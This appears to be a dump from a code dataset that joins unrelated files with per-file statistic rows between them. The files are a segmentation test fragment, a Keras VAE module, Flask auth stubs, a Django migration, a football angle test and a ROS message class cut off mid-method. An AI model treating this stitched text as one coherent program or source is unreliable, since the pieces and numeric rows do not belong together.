norm_layer=nn.BatchNorm2d)
dec = create_decoder(name="unet", feature_info=enc.feature_info, act_layer=nn.ReLU, norm_layer=nn.BatchNorm2d)
# extract intermediate features when encoder KD is required
extract_features = True
task = Task(name="222a", dataset="potsdam", step=1, add_background=True)
icl_model = ICLSegmenter(enc, dec, classes=task.num_classes_per_task(), return_features=extract_features)
# we do not expect old classifiers at step 1
assert len(icl_model.classifiers) == 2
icl_model.init_classifier()
# assert that the init worked
LOG.info("old weight shape: %s", str(icl_model.classifiers[0].out.weight.shape))
LOG.info("new weight shape: %s", str(icl_model.classifiers[1].out.weight.shape))
# assert that both new classes got the new fancy weights
assert torch.all(icl_model.classifiers[0].out.weight[0] == icl_model.classifiers[1].out.weight[0])
assert torch.all(icl_model.classifiers[0].out.weight[0] == icl_model.classifiers[1].out.weight[1])
inp = torch.rand(1, 3, 256, 256)
# should be composed of two pieces given extract features = True
out = icl_model(inp)
assert len(out) == 2
out, (enc_features, dec_features) = out
# output dimension should include bkgr + 2 classes + 2 classes
assert out.shape == (1, 5, 256, 256)
assert dec_features.shape == (1, dec.output(), 256, 256)
assert len(enc_features) == 5
| 41.103286
| 114
| 0.58458
| 1,100
| 8,755
| 4.516364
| 0.124545
| 0.038043
| 0.02818
| 0.036634
| 0.869767
| 0.863325
| 0.843398
| 0.819444
| 0.819444
| 0.819444
| 0
| 0.038222
| 0.303712
| 8,755
| 212
| 115
| 41.29717
| 0.776739
| 0.102113
| 0
| 0.796512
| 0
| 0
| 0.044371
| 0
| 0
| 0
| 0
| 0
| 0.174419
| 1
| 0.052326
| false
| 0
| 0.046512
| 0
| 0.098837
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
236824b89f8b2a329751a496d5d4e46c2c86aa9e
| 9,877
|
py
|
Python
|
autoencoders/VAE.py
|
Loptt/pong-autoencoder
|
c5123bb2466f644f7513d807044e11a4a17aae22
|
[
"MIT"
] | null | null | null |
autoencoders/VAE.py
|
Loptt/pong-autoencoder
|
c5123bb2466f644f7513d807044e11a4a17aae22
|
[
"MIT"
] | 1
|
2021-03-19T03:06:46.000Z
|
2021-08-02T13:29:05.000Z
|
autoencoders/VAE.py
|
Loptt/pong-autoencoder
|
c5123bb2466f644f7513d807044e11a4a17aae22
|
[
"MIT"
] | null | null | null |
import keras
import tensorflow as tf
from keras import layers, Input, Model
from functools import reduce
from keras.utils.vis_utils import plot_model
from .sampling import Sampling
from .internal import VAEBallTrackInternal, VAEBallTrackNoPaddleInternal, VAEInternal, VAEInternalPerceptual
from .coord_conv import CoordinateChannel2D
class VAE():
def __init__(self, layers, input_shape, latent_size, kernel_size=3, filters=8, beta=1, name='Autoencoder'):
self.layers = layers
self.input_shape = input_shape
self.latent_size = latent_size
self.pooling_factor = (2, 2)
self.kernel_size = (kernel_size, kernel_size)
self.initial_filters = filters
self.final_filters = 0
self.flat_size = 0
self.reshaping_shape = (1,)
self.input_size = reduce((lambda x, y: x*y), input_shape)
self.beta = beta
self.encoder = self.create_encoder()
self.decoder = self.create_decoder()
self.model = VAEInternal(
self.encoder, self.decoder, name=name, beta=beta)
batch_input = list(input_shape)
batch_input.insert(0, None)
batch_input = tuple(batch_input)
self.model.build(batch_input)
self.model.compile(optimizer='adam')
def create_encoder(self):
filters = self.initial_filters
input_img = Input(shape=self.input_shape, name='input_encoder')
x = input_img
for i in range(self.layers):
x = layers.Conv2D(filters, self.kernel_size, activation='relu',
padding='same', name=f'conv{i+1}_enc')(x)
x = layers.MaxPooling2D(
self.pooling_factor, padding='same', name=f'maxpool{i+1}')(x)
filters *= 2
flat = layers.Flatten(name='flatten')(x)
bn = layers.Dense(self.latent_size, name='bottleneck')(flat)
z_mean = layers.Dense(self.latent_size, name="z_mean")(bn)
z_log_var = layers.Dense(self.latent_size, name="z_log_var")(bn)
z = Sampling()([z_mean, z_log_var])
# Saving values for the decoder
self.reshaping_shape = x.shape[1:]
self.final_filters = filters / 2
self.flat_size = flat.shape[1]
return Model(input_img, [z_mean, z_log_var, z], name='Encoder')
def create_decoder(self):
filters = self.final_filters
input_decoder = Input(shape=(self.latent_size,), name='input_decoder')
dec = layers.Dense(self.flat_size, name="decoding")(input_decoder)
reshaped = layers.Reshape(self.reshaping_shape, name='reshape')(dec)
x = reshaped
for i in range(self.layers):
x = layers.Conv2D(filters, self.kernel_size, activation='relu',
padding='same', name=f'conv{self.layers-i}_dec')(x)
x = layers.UpSampling2D(
self.pooling_factor, name=f'upsamp{self.layers-i}')(x)
filters /= 2
# Calculate the kernel size for the last layer, in order for it to have the same
# width and height as the input image
kernel_y = x.shape[1] - self.input_shape[0] + 1
kernel_x = x.shape[2] - self.input_shape[1] + 1
decoded = layers.Conv2D(
self.input_shape[-1], (kernel_y, kernel_x), activation='sigmoid', padding='valid', name='output')(x)
return Model(input_decoder, decoded, name="Decoder")
def train(self, train_gen, val_gen, epochs, batch_size=32, callbacks=[]):
history = self.model.fit(
train_gen,
epochs=epochs,
batch_size=batch_size,
shuffle=True,
validation_data=val_gen,
callbacks=callbacks)
return history
# Train by inputting tensors and not generators
def train_primitive(self, train, val, epochs, batch_size=32, callbacks=[]):
history = self.model.fit(
x=train, y=train,
epochs=epochs,
batch_size=batch_size,
shuffle=True,
validation_data=(val, val),
callbacks=callbacks)
return history
def predict(self, imgs):
return self.model.predict(imgs)
def summary(self):
self.encoder.summary()
self.decoder.summary()
self.model.summary()
def evaluate(self, data):
rec = self.model.predict(data)
reconstruction_loss = tf.reduce_mean(
tf.reduce_sum(
keras.losses.binary_crossentropy(data, rec), axis=(1, 2)
)
)
return reconstruction_loss.numpy()
class VAEPerceptual(VAE):
def __init__(self, layers, input_shape, latent_size, kernel_size, filters, name):
super().__init__(layers, input_shape, latent_size,
kernel_size=kernel_size, filters=filters, name=name)
self.model = VAEInternalPerceptual(
self.encoder, self.decoder, name=name)
batch_input = list(input_shape)
batch_input.insert(0, None)
batch_input = tuple(batch_input)
self.model.build(batch_input)
self.model.compile(optimizer=keras.optimizers.Adam())
def summary(self):
self.model.summary_perceptual()
super().summary()
class VAEBallTrack(VAE):
def __init__(self, layers, input_shape, latent_size, kernel_size, filters, name):
super().__init__(layers, input_shape, latent_size,
kernel_size=kernel_size, filters=filters, name=name)
self.model = VAEBallTrackInternal(
self.encoder, self.decoder, name=name)
batch_input = list(input_shape)
batch_input.insert(0, None)
batch_input = tuple(batch_input)
self.model.build(batch_input)
self.model.compile(optimizer=keras.optimizers.Adam(), run_eagerly=True)
def summary(self):
super().summary()
class VAEBallTrackNoPaddle(VAE):
def __init__(self, layers, input_shape, latent_size, kernel_size, filters, name):
super().__init__(layers, input_shape, latent_size,
kernel_size=kernel_size, filters=filters, name=name)
self.model = VAEBallTrackNoPaddleInternal(
self.encoder, self.decoder, name=name)
batch_input = list(input_shape)
batch_input.insert(0, None)
batch_input = tuple(batch_input)
self.model.build(batch_input)
self.model.compile(optimizer=keras.optimizers.Adam(), run_eagerly=True)
def summary(self):
super().summary()
def train(self, train_gen, val_gen, epochs, batch_size=32, callbacks=[]):
self.model.setup_coordinate_array(batch_size)
history = self.model.fit(
train_gen,
epochs=epochs,
batch_size=batch_size,
shuffle=True,
validation_data=val_gen,
callbacks=callbacks)
return history
# Train by inputting tensors and not generators
def train_primitive(self, train, val, epochs, batch_size=32, callbacks=[]):
self.model.setup_coordinate_array(batch_size)
history = self.model.fit(
x=train, y=train,
epochs=epochs,
batch_size=batch_size,
shuffle=True,
validation_data=(val, val),
callbacks=callbacks)
return history
class VAECoordConv(VAE):
def __init__(self, layers, input_shape, latent_size, kernel_size, filters, name):
super().__init__(layers, input_shape, latent_size,
kernel_size=kernel_size, filters=filters, name=name)
def create_encoder(self):
filters = self.initial_filters
input_img = Input(shape=self.input_shape, name='input_encoder')
x = input_img
x = CoordinateChannel2D()(x)
for i in range(self.layers):
x = layers.Conv2D(filters, self.kernel_size, activation='relu',
padding='same', name=f'conv{i+1}_enc')(x)
x = layers.MaxPooling2D(
self.pooling_factor, padding='same', name=f'maxpool{i+1}')(x)
filters *= 2
flat = layers.Flatten(name='flatten')(x)
bn = layers.Dense(self.latent_size, name='bottleneck')(flat)
z_mean = layers.Dense(self.latent_size, name="z_mean")(bn)
z_log_var = layers.Dense(self.latent_size, name="z_log_var")(bn)
z = Sampling()([z_mean, z_log_var])
# Saving values for the decoder
self.reshaping_shape = x.shape[1:]
self.final_filters = filters / 2
self.flat_size = flat.shape[1]
return Model(input_img, [z_mean, z_log_var, z], name='Encoder')
def create_decoder(self):
filters = self.final_filters
input_decoder = Input(shape=(self.latent_size,), name='input_decoder')
x = CoordinateChannel2D()(input_decoder)
dec = layers.Dense(self.flat_size, name="decoding")(x)
reshaped = layers.Reshape(self.reshaping_shape, name='reshape')(dec)
x = reshaped
for i in range(self.layers):
#x = CoordinateChannel2D()(x)
x = layers.Conv2D(filters, self.kernel_size, activation='relu',
padding='same', name=f'conv{self.layers-i}_dec')(x)
x = layers.UpSampling2D(
self.pooling_factor, name=f'upsamp{self.layers-i}')(x)
filters /= 2
# Calculate the kernel size for the last layer, in order for it to have the same
# width and height as the input image
kernel_y = x.shape[1] - self.input_shape[0] + 1
kernel_x = x.shape[2] - self.input_shape[1] + 1
# Add coordinate filter in last conv layer
decoded = layers.Conv2D(
self.input_shape[-1], (kernel_y, kernel_x), activation='sigmoid', padding='valid', name='output')(x)
return Model(input_decoder, decoded, name="Decoder")
| 36.446494
| 112
| 0.623367
| 1,222
| 9,877
| 4.838789
| 0.126023
| 0.047353
| 0.035515
| 0.033486
| 0.801793
| 0.793675
| 0.788601
| 0.788601
| 0.788601
| 0.788601
| 0
| 0.00883
| 0.266174
| 9,877
| 270
| 113
| 36.581481
| 0.806981
| 0.04556
| 0
| 0.74
| 0
| 0
| 0.042799
| 0.009346
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095
| false
| 0
| 0.04
| 0.005
| 0.21
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0032868b7467ee7374b196c4f9443eb1dbd23902
| 242
|
py
|
Python
|
app/api/v2/resources/auth.py
|
misatifelix/fast-food-fast-api
|
083fee0993e8d2d0152b4cd13c1ab558d0ba9283
|
[
"MIT"
] | 2
|
2018-09-26T16:55:50.000Z
|
2020-03-10T08:56:35.000Z
|
app/api/v2/resources/auth.py
|
misatifelix/fast-food-fast-api
|
083fee0993e8d2d0152b4cd13c1ab558d0ba9283
|
[
"MIT"
] | 1
|
2019-10-21T17:13:51.000Z
|
2019-10-21T17:13:51.000Z
|
app/api/v2/resources/auth.py
|
misatifelix/fast-food-fast-api
|
083fee0993e8d2d0152b4cd13c1ab558d0ba9283
|
[
"MIT"
] | null | null | null |
from flask_restful import Resource
class RegisterResource(Resource):
def post(self):
pass
class LoginResource(Resource):
def post(self):
pass
class LogoutResource(Resource):
def post(self):
pass
| 17.285714
| 34
| 0.652893
| 26
| 242
| 6.038462
| 0.5
| 0.210191
| 0.286624
| 0.363057
| 0.503185
| 0.356688
| 0
| 0
| 0
| 0
| 0
| 0
| 0.272727
| 242
| 13
| 35
| 18.615385
| 0.892045
| 0
| 0
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.3
| false
| 0.3
| 0.1
| 0
| 0.7
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
cc566d05cebd86c4b889c225118123b306bb3b3c
| 2,974
|
py
|
Python
|
src/blogapp/migrations/0004_auto_20211226_1039.py
|
robertsmoto/sodavault
|
200e843be7abe6cc447647bba55c7c1309092e5e
|
[
"BSD-3-Clause"
] | null | null | null |
src/blogapp/migrations/0004_auto_20211226_1039.py
|
robertsmoto/sodavault
|
200e843be7abe6cc447647bba55c7c1309092e5e
|
[
"BSD-3-Clause"
] | null | null | null |
src/blogapp/migrations/0004_auto_20211226_1039.py
|
robertsmoto/sodavault
|
200e843be7abe6cc447647bba55c7c1309092e5e
|
[
"BSD-3-Clause"
] | null | null | null |
# Generated by Django 3.2.3 on 2021-12-26 10:39
from django.db import migrations, models
import utilities.utils_images
class Migration(migrations.Migration):
dependencies = [
('blogapp', '0003_auto_20211011_0924'),
]
operations = [
migrations.AddField(
model_name='category',
name='image_lg_square',
field=models.CharField(blank=True, help_text='automatic size: 500px x 500px', max_length=200),
),
migrations.AddField(
model_name='category',
name='image_md_square',
field=models.CharField(blank=True, help_text='automatic size: 250px x 250px', max_length=200),
),
migrations.AddField(
model_name='category',
name='image_sm_square',
field=models.CharField(blank=True, help_text='automatic size: 200px x 200px', max_length=200),
),
migrations.AddField(
model_name='post',
name='featured_lg',
field=models.CharField(blank=True, help_text='automatic size: 1600px x 800px', max_length=200),
),
migrations.AddField(
model_name='post',
name='featured_md',
field=models.CharField(blank=True, help_text='automatic size: 800px x 400px', max_length=200),
),
migrations.AddField(
model_name='post',
name='featured_sm',
field=models.CharField(blank=True, help_text='automatic size: 400px x 200px', max_length=200),
),
migrations.AddField(
model_name='post',
name='thumb_lg',
field=models.CharField(blank=True, help_text='automatic size: 500px x 500px', max_length=200),
),
migrations.AddField(
model_name='post',
name='thumb_md',
field=models.CharField(blank=True, help_text='automatic size: 250px x 250px', max_length=200),
),
migrations.AddField(
model_name='post',
name='thumb_sm',
field=models.CharField(blank=True, help_text='automatic size: 200px x 200px', max_length=200),
),
migrations.AlterField(
model_name='category',
name='image',
field=models.ImageField(blank=True, help_text='recommended size to 500px x 500px', null=True, upload_to=utilities.utils_images.new_filename_blog_cat),
),
migrations.AlterField(
model_name='post',
name='featured_image',
field=models.ImageField(blank=True, help_text='Recommended size: 1600 x 800px', null=True, upload_to=utilities.utils_images.new_filename_blog_feat),
),
migrations.AlterField(
model_name='post',
name='thumbnail_image',
field=models.ImageField(blank=True, help_text='Recommended size: 500 x 500px', null=True, upload_to=utilities.utils_images.new_filename_blog_thumb),
),
]
| 39.653333
| 162
| 0.61197
| 336
| 2,974
| 5.220238
| 0.214286
| 0.061574
| 0.08894
| 0.116306
| 0.851197
| 0.834664
| 0.792474
| 0.767389
| 0.767389
| 0.767389
| 0
| 0.061168
| 0.274378
| 2,974
| 74
| 163
| 40.189189
| 0.751622
| 0.015131
| 0
| 0.617647
| 1
| 0
| 0.199522
| 0.007858
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.029412
| 0
| 0.073529
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cc5f79cf1227d225010345d2b852c5595753d8f5
| 1,246
|
py
|
Python
|
gfootball/test/common/state/test_angle.py
|
andrewchou/football
|
11aea4d6a92d94e0ec92db9bc7e2214f396f884d
|
[
"Apache-2.0"
] | null | null | null |
gfootball/test/common/state/test_angle.py
|
andrewchou/football
|
11aea4d6a92d94e0ec92db9bc7e2214f396f884d
|
[
"Apache-2.0"
] | null | null | null |
gfootball/test/common/state/test_angle.py
|
andrewchou/football
|
11aea4d6a92d94e0ec92db9bc7e2214f396f884d
|
[
"Apache-2.0"
] | null | null | null |
import unittest
from unittest import TestCase
import numpy as np
from gfootball.common.state.angle import relative_angle_bucket
class AngleTestCase(TestCase):
def test_relative_angle_bucket(self):
self.assertEqual(0, relative_angle_bucket(delta_position=np.array([1.0, -.1])))
self.assertEqual(0, relative_angle_bucket(delta_position=np.array([1.0, 0.0])))
self.assertEqual(0, relative_angle_bucket(delta_position=np.array([1.0, 0.1])))
self.assertEqual(1, relative_angle_bucket(delta_position=np.array([1.0, 1.0])))
self.assertEqual(2, relative_angle_bucket(delta_position=np.array([0.0, 1.0])))
self.assertEqual(3, relative_angle_bucket(delta_position=np.array([-1.0, 1.0])))
self.assertEqual(4, relative_angle_bucket(delta_position=np.array([-1.0, 0.0])))
self.assertEqual(5, relative_angle_bucket(delta_position=np.array([-1.0, -1.0])))
self.assertEqual(6, relative_angle_bucket(delta_position=np.array([0.0, -1.0])))
self.assertEqual(7, relative_angle_bucket(delta_position=np.array([1.0, -1.0])))
# No angle
self.assertEqual(0, relative_angle_bucket(delta_position=np.array([0.0, 0.0])))
if __name__ == '__main__':
unittest.main()
| 47.923077
| 89
| 0.712681
| 188
| 1,246
| 4.478723
| 0.180851
| 0.033254
| 0.293349
| 0.313539
| 0.739905
| 0.739905
| 0.739905
| 0.739905
| 0.739905
| 0.73753
| 0
| 0.050093
| 0.134831
| 1,246
| 25
| 90
| 49.84
| 0.730983
| 0.006421
| 0
| 0
| 0
| 0
| 0.006472
| 0
| 0
| 0
| 0
| 0
| 0.578947
| 1
| 0.052632
| false
| 0
| 0.210526
| 0
| 0.315789
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
aee836af32d5cee8fdb8ac311ddccdbf0f95b8ce
| 19,062
|
py
|
Python
|
objdetect_msgs/src/objdetect_msgs/msg/_DetectGridScores.py
|
MRSD2018/reefbot-1
|
a595ca718d0cda277726894a3105815cef000475
|
[
"MIT"
] | null | null | null |
objdetect_msgs/src/objdetect_msgs/msg/_DetectGridScores.py
|
MRSD2018/reefbot-1
|
a595ca718d0cda277726894a3105815cef000475
|
[
"MIT"
] | null | null | null |
objdetect_msgs/src/objdetect_msgs/msg/_DetectGridScores.py
|
MRSD2018/reefbot-1
|
a595ca718d0cda277726894a3105815cef000475
|
[
"MIT"
] | null | null | null |
"""autogenerated by genpy from objdetect_msgs/DetectGridScores.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import sensor_msgs.msg
import genpy
import objdetect_msgs.msg
import std_msgs.msg
class DetectGridScores(genpy.Message):
_md5sum = "177d931fe6488b6b75f16e4d7b7caf56"
_type = "objdetect_msgs/DetectGridScores"
_has_header = True #flag to mark the presence of a Header object
_full_text = """# Specifies socres on a detection grid that runs (x,y,w,h). If the aspect ratio is fixed, this will change to (x,y,s)
Header header
# The (w,h,x,y) grid that has a response
Grid grid
# A grid of scores across the space that are based on an evaluation
# for each box.
sensor_msgs/MatND scores
# An optional binary mask that is 4 dimensional (w,h,x,y) and
# specifies which entries have valid values
sensor_msgs/MatND mask
# The processing time to calculate the detection
std_msgs/Duration processing_time
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.secs: seconds (stamp_secs) since epoch
# * stamp.nsecs: nanoseconds since stamp_secs
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
# 0: no frame
# 1: global frame
string frame_id
================================================================================
MSG: objdetect_msgs/Grid
# Specifies a w,h,x,y dense grid
# The starting points for the location search
uint32 minX
uint32 minY
# The strides in the location space
uint32 strideX
uint32 strideY
# The starting points for the scaling
uint32 minW
uint32 minH
# The strides in the w, h space. In this case, we step by growing by a
# fraction, so that width_i is round(minWidth*strideW^i)
float64 strideW
float64 strideH
# True if the width and height should be a consistent aspect ratio that are
# defined by minW and minH. This reduces the grid to (s,x,y)
bool fixAspect
================================================================================
MSG: sensor_msgs/MatND
# A message that contains an uncompressed n dimensional
# matrix. Designed to be compatible with the opencv n-dimensional
# matrix.
Header header
int32[] sizes # The size of each dimension in the matrix
string encoding # The data type see src/image_encodings.cpp
bool is_bigendian # Is the data bigendian?
uint8[] data # The actual data
================================================================================
MSG: std_msgs/Duration
duration data
"""
__slots__ = ['header','grid','scores','mask','processing_time']
_slot_types = ['std_msgs/Header','objdetect_msgs/Grid','sensor_msgs/MatND','sensor_msgs/MatND','std_msgs/Duration']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
header,grid,scores,mask,processing_time
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(DetectGridScores, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.header is None:
self.header = std_msgs.msg.Header()
if self.grid is None:
self.grid = objdetect_msgs.msg.Grid()
if self.scores is None:
self.scores = sensor_msgs.msg.MatND()
if self.mask is None:
self.mask = sensor_msgs.msg.MatND()
if self.processing_time is None:
self.processing_time = std_msgs.msg.Duration()
else:
self.header = std_msgs.msg.Header()
self.grid = objdetect_msgs.msg.Grid()
self.scores = sensor_msgs.msg.MatND()
self.mask = sensor_msgs.msg.MatND()
self.processing_time = std_msgs.msg.Duration()
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
_x = self.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_struct_6I2dB3I.pack(_x.grid.minX, _x.grid.minY, _x.grid.strideX, _x.grid.strideY, _x.grid.minW, _x.grid.minH, _x.grid.strideW, _x.grid.strideH, _x.grid.fixAspect, _x.scores.header.seq, _x.scores.header.stamp.secs, _x.scores.header.stamp.nsecs))
_x = self.scores.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.scores.sizes)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(struct.pack(pattern, *self.scores.sizes))
_x = self.scores.encoding
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_B.pack(self.scores.is_bigendian))
_x = self.scores.data
length = len(_x)
# - if encoded as a list instead, serialize as bytes instead of string
if type(_x) in [list, tuple]:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_struct_3I.pack(_x.mask.header.seq, _x.mask.header.stamp.secs, _x.mask.header.stamp.nsecs))
_x = self.mask.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.mask.sizes)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(struct.pack(pattern, *self.mask.sizes))
_x = self.mask.encoding
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_B.pack(self.mask.is_bigendian))
_x = self.mask.data
length = len(_x)
# - if encoded as a list instead, serialize as bytes instead of string
if type(_x) in [list, tuple]:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_struct_2i.pack(_x.processing_time.data.secs, _x.processing_time.data.nsecs))
except struct.error as se: self._check_types(se)
except TypeError as te: self._check_types(te)
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.header is None:
self.header = std_msgs.msg.Header()
if self.grid is None:
self.grid = objdetect_msgs.msg.Grid()
if self.scores is None:
self.scores = sensor_msgs.msg.MatND()
if self.mask is None:
self.mask = sensor_msgs.msg.MatND()
if self.processing_time is None:
self.processing_time = std_msgs.msg.Duration()
end = 0
_x = self
start = end
end += 12
(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.header.frame_id = str[start:end].decode('utf-8')
else:
self.header.frame_id = str[start:end]
_x = self
start = end
end += 53
(_x.grid.minX, _x.grid.minY, _x.grid.strideX, _x.grid.strideY, _x.grid.minW, _x.grid.minH, _x.grid.strideW, _x.grid.strideH, _x.grid.fixAspect, _x.scores.header.seq, _x.scores.header.stamp.secs, _x.scores.header.stamp.nsecs,) = _struct_6I2dB3I.unpack(str[start:end])
self.grid.fixAspect = bool(self.grid.fixAspect)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.scores.header.frame_id = str[start:end].decode('utf-8')
else:
self.scores.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
self.scores.sizes = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.scores.encoding = str[start:end].decode('utf-8')
else:
self.scores.encoding = str[start:end]
start = end
end += 1
(self.scores.is_bigendian,) = _struct_B.unpack(str[start:end])
self.scores.is_bigendian = bool(self.scores.is_bigendian)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.scores.data = str[start:end].decode('utf-8')
else:
self.scores.data = str[start:end]
_x = self
start = end
end += 12
(_x.mask.header.seq, _x.mask.header.stamp.secs, _x.mask.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.mask.header.frame_id = str[start:end].decode('utf-8')
else:
self.mask.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
self.mask.sizes = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.mask.encoding = str[start:end].decode('utf-8')
else:
self.mask.encoding = str[start:end]
start = end
end += 1
(self.mask.is_bigendian,) = _struct_B.unpack(str[start:end])
self.mask.is_bigendian = bool(self.mask.is_bigendian)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.mask.data = str[start:end].decode('utf-8')
else:
self.mask.data = str[start:end]
_x = self
start = end
end += 8
(_x.processing_time.data.secs, _x.processing_time.data.nsecs,) = _struct_2i.unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
_x = self.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_struct_6I2dB3I.pack(_x.grid.minX, _x.grid.minY, _x.grid.strideX, _x.grid.strideY, _x.grid.minW, _x.grid.minH, _x.grid.strideW, _x.grid.strideH, _x.grid.fixAspect, _x.scores.header.seq, _x.scores.header.stamp.secs, _x.scores.header.stamp.nsecs))
_x = self.scores.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.scores.sizes)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(self.scores.sizes.tostring())
_x = self.scores.encoding
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_B.pack(self.scores.is_bigendian))
_x = self.scores.data
length = len(_x)
# - if encoded as a list instead, serialize as bytes instead of string
if type(_x) in [list, tuple]:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_struct_3I.pack(_x.mask.header.seq, _x.mask.header.stamp.secs, _x.mask.header.stamp.nsecs))
_x = self.mask.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.mask.sizes)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(self.mask.sizes.tostring())
_x = self.mask.encoding
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_B.pack(self.mask.is_bigendian))
_x = self.mask.data
length = len(_x)
# - if encoded as a list instead, serialize as bytes instead of string
if type(_x) in [list, tuple]:
